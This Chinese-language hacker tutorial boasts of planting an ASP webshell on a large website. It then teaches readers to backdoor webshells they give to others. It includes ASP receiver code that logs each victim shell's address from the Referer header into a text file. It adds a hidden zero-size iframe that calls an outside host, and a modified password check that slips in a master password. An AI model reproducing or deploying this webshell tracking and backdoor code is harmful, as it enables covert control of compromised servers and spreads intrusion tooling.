呵呵......最近有小菜給我一個馬， 說是很不錯， 還說免殺， 當時也沒有注意， 有一次在高一個大站的時候， 剛好利用上， 感覺還不錯， 但是我第三天就發現馬沒了， 郁悶死了， TMD， 當時還以為管理員發現了呢， 還好當時， 留了一個過掃描的一句話后門， （唉....怕別人進來， 我還把漏洞補了）接著， 就不說了， 然后就是傳上自己的大馬， 進去用雷克圖掃了下， 發現好多的后門， 而且都很隱蔽。 突然感覺不對， 看來是螳螂捕蟬黃雀在后啊！馬上寫出解密函數， 把他解密了， 然后發現了以下代碼

<iframe src=http://xxxx.xxxx.com/mm.asp width=0 height=0></iframe>

呵呵， 很熟悉吧， 訪問了下， http://xxxx.xxxx.com， 卡巴立馬就報警了， 靠， TMD的首頁掛馬了， 然后加了mm.asp， 是個空白， 真是變態， 首頁掛馬， 還搞了個接受頁， 鄙視下， 那么下面我們進入正題。 告訴， 大家， 如何給我們的腳本木馬加后門， 呵呵做收漁利哦！首先找個asp空間， 新建一個asp接收頁， 代碼如下：

    <%url=Request.ServerVariables("HTTP_Referer")

　　set fs=server.CreateObject("Scripting.FileSystemObject")

　　set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)

　　file.writeline url

　　file.close

　　set file=nothing

　　set fs=nothing

　　%>

呵呵......HTTP_REFERER這個函數都熟悉吧， 簡單來說就是獲得webshell的地址然后記錄在bobo.txt這里文本里， 然后里用<iframe src=網站地址 width=0 height=0></iframe>插到asp木馬中， 大家可能要問了， 那只能記錄地址啊， 呵呵......

還有了， 首先我們看看ASP密碼驗證

IF SEssIoN("web2a2dmin")<>UsERpaSs thEn

　　IF requeSt.FoRM("pass")<>"" TheN

　　iF REquesT.foRM("pass")=uSERPASS  Then

　　SEsSIoN("web2a2dmin")=uSERPAss

呵呵， 大家都知道or的作用吧， 如果我們將第三句改為iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="520jsj" Then， 怎么用， 這樣我們的ASP木馬就把弄了個萬能密碼， 密碼為520jsj

     呵呵.....就到這里了， 繼續關注我們的網站哦， 哈哈，